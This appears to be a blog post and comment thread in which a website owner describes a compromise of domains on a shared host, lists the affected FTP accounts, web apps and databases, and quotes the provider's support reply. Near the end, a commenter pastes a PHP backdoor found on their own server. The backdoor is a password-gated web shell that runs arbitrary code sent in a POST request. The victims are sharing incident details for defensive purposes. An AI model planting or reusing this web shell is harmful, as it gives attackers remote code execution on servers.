RewriteEngine On
RewriteRule ^category/([^/\.]+)/?$ index.php?category=$1 [L]
RewriteRule ^category/([^/\.]+)/page/([0-9]+)/?$ index.php?category=$1&page=$2 [L]
RewriteRule ^download/([^/\.]+)/?$ download.php?id=$1 [L]
RewriteRule ^page/([0-9]+)/?$ index.php?page=$1 [L]
RewriteRule ^([^/\.]+)/?$ index.php?id=$1 [L]
RewriteRule ^rss20.xml$ index.php?action=rss [L]

FTP – my password was reasonable and not used very often – these are mostly parked domains of mine or things I have hosted for friends. My work domains are elsewhere …

Web Apps – a couple of the domains had Wordpress installed, one had Drupal. Most were flat files – normally just an index.html page – many of these are just used for people having personalised email accounts.

Databases – didn’t seem to be anything in any of the databases associated with any of the domains – all bar the one I am actually using are now toast.

Servage:

Due to the clustered structure of our systems there is no single log file for you to use as your site is served by many servers.

Also,we are sorry to hear about the problem you are facing. Its hard to say how they changed and created these file. Most attackers use an upload script that allows them to infect files. They do so by exploiting any non-secure scripts which are being used on the website.

Please recheck the scripts being used for any such security loopholes. Also remove the malicious codes from your infected file(s) or re-upload the files from your local backup.

Luvvverly. “It’s all your fault and no we don’t have any logs.”

And yes, servage is my hosting provider.

@zaenal

What was in the .htaccess file?

I just found this intrusion on my server. And I also found the folder containing htaccess and index.php. The PHP file look like this:

——–
error_reporting(E_ALL);
if (isset($_POST['09257409']) && md5($_POST['09257409']) == ‘16ad2316956c498aa9e1cae9733cea27′) {
$test_func = create_function(”, urldecode($_POST['f']));
$test_func();
}
exit();
——–

@zaenal